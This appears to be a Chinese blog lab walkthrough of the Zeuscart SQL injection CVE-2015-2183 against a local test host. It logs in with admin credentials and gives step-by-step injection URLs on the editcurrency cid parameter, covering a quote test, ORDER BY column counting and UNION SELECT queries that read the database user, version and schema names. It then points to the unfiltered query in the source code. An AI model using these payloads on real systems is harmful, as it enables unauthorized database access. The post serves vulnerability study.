2018-05-20

【CMS注入】CVE-2015-2183 Zeuscart SQL注入漏洞

1.1 目标网站 http://192.168.1.3

1.2 访问 http://192.168.1.3/admin

1.3 使用账户 admin 密码 admin888 登录

1.4 访问 http://192.168.1.3/admin/?do=editcurrency&cid=1

1.5 访问 http://192.168.1.3/admin/?do=editcurrency&cid=1′  发现页面和之前不一样,说明存在注入

1.6 访问 http://192.168.1.3/admin/?do=editcurrency&cid=1+order+by+5+–+ 页面正常

1.7 访问 http://192.168.1.3/admin/?do=editcurrency&cid=1+order+by+6+–+ 发现页面和之前不一样,说明当前查询了5个字段

1.8 访问 http://192.168.1.3/admin/?do=editcurrency&cid=1+union+select+1,2,3,4,5+–+ 发现2和4回显

1.9 访问 http://192.168.1.3/admin/?do=editcurrency&cid=1+union+select+1,user(),3,version(),5+–+ 查询当前用户和版本

1.10 访问 http://192.168.1.3/admin/?do=editcurrency&cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information.schema.schemata–+ 查询当前所有数据库

1.11 在目标机中打开【C:\phpStudy\WWW\admin\classes\Core\Settings】下的【CCurrencySettings.php】中的第182行,调用了editcurrency会找到showeditCurrency函数,然后判断是否接收cid参数,如果接收实例化Bin_Query类然后调用里面的executeQuery函数执行sql语句。

1.12 打开【C:\phpStudy\WWW\Bin】下的【Query.php】中的第49行,可以看到执行sql语句并没有过滤。

Share

You may also like...

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据